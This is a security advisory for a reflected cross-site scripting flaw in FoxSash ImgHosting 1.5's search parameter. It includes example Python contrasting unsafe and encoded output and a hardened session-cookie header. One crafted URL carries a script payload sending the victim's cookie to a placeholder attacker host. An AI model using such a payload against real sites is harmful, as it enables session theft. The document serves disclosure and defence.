PT-2018-16984 · Foxsash · Foxsash Imghosting
Dennis Veninga
·
Published
2018-01-15
·
Updated
2018-02-05
·
CVE-2018-5479
CVSS v3.1
6.1
Medium
| Vector | AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Name of the Vulnerable Software and Affected Versions
FoxSash ImgHosting version 1.5
Description
The issue is a reflected cross-site scripting (XSS) vulnerability in the search function: the value of the search parameter on the default URI is reflected into the page without adequate output encoding. An attacker who lures a logged-in user or administrator into opening a crafted URL can execute attacker-supplied JavaScript in the victim's browser, which can be used to steal the user's or admin's session.
Recommendations
For FoxSash ImgHosting version 1.5, as a temporary workaround, disable the search function until a patch is available. Restrict access to the user/admin login interface to reduce the risk of session theft. Avoid the search parameter on the affected URI until the issue is resolved.
Exploit
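The following is an added illustration of the reflected-XSS pattern the advisory describes and of the two mitigations it implies (encode the reflected parameter; harden the session cookie so a script cannot read it). It is example code, not FoxSash ImgHosting's own source. The host name imghost.example, the exfiltration host evil.example, the cookie name SESSIONID and the crafted payload are all constructed for the example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker URL of the kind the advisory describes: the "search"
# parameter carries script that would run in the victim's browser and send the
# session cookie to an attacker-controlled host. Hosts are placeholders.
CRAFTED_URL = (
    "http://imghost.example/?search="
    "<script>document.location='http://evil.example/?c='%2Bdocument.cookie</script>"
)


def search_term_from_url(url: str) -> str:
    """Pull the 'search' parameter out of a URL the way a query parser would."""
    query = urlsplit(url).query
    return parse_qs(query).get("search", [""])[0]


def render_vulnerable(term: str) -> str:
    """Reflects the raw parameter into the response: the reflected-XSS pattern.

    This stands in for the behaviour reported in the advisory; it is not the
    product's actual template.
    """
    return f"<h1>Results for: {term}</h1>"


def render_fixed(term: str) -> str:
    """HTML-encodes the parameter before reflecting it, so markup stays inert.

    quote=True also encodes ' and " so the value is safe inside attributes.
    """
    return f"<h1>Results for: {html.escape(term, quote=True)}</h1>"


def contains_live_script(page: str) -> bool:
    """Crude check used only to contrast the two renderings above:
    an unencoded <script tag in the output means the payload survived."""
    return "<script" in page.lower()


def session_cookie_header(session_id: str) -> str:
    """Hardened Set-Cookie line (cookie name SESSIONID is an assumption).

    HttpOnly keeps document.cookie from exposing the session id, so even a
    successful XSS cannot exfiltrate it the way the payload above tries to;
    Secure and SameSite limit other ways of leaking or replaying it.
    """
    return (
        f"Set-Cookie: SESSIONID={session_id}; Path=/; "
        "HttpOnly; Secure; SameSite=Lax"
    )


if __name__ == "__main__":
    term = search_term_from_url(CRAFTED_URL)
    print("vulnerable:", render_vulnerable(term))
    print("fixed:     ", render_fixed(term))
    print(session_cookie_header("0123456789abcdef"))
```

Running the module prints the same crafted term rendered both ways; only the vulnerable rendering still contains an executable script element. Output encoding at the point of reflection is the actual fix; the HttpOnly cookie is defence in depth that blunts the session-theft outcome the advisory warns about but does not remove the XSS itself.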
Fix
XSS
Weakness Enumeration
Related Identifiers
Affected Products
Foxsash Imghosting